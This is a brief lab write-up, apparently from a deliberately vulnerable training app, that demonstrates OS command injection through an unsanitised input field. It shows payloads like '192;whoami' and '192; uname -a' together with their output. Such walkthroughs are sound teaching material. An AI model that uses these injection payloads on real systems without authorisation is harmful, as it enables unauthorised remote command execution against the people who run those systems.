### Objective

Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.

Since it's a low one, they probably didn't sanitize any inputs. Let's try a common payload
```txt
192;ls
```
```txt
help
index.php
source
```
And yep not sanitized.
Let's get the user and hostname.
```txt
192;whoami
```
```txt
www-data
```
```txt
192; uname -a
```
```txt
Linux 920c21f487f5 5.10.0-6parrot1-amd64 #1 SMP Debian 5.10.28-6parrot1 (2021-04-12) x86_64 GNU/Linux
```
